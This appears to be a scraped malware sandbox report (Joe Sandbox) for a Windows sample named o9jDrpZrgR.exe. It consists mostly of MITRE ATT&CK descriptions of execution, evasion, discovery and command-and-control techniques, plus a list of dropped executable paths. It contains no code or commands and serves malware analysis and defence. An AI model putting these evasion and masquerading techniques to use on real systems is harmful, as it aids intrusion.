Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report o9jDrpZrgR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\088424020bedd6

C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe

C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2

C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe

C:\Recovery\9bce06a9fec5b2

C:\Recovery\qBJICEqiLNwXNBLrN.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BlockrefBrokerperf.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\9bce06a9fec5b2

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe

C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat

C:\Users\user\AppData\Local\Temp\nltb4WKmeR

C:\Users\user\Contacts\9bce06a9fec5b2

C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Windows Analysis Report
o9jDrpZrgR.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre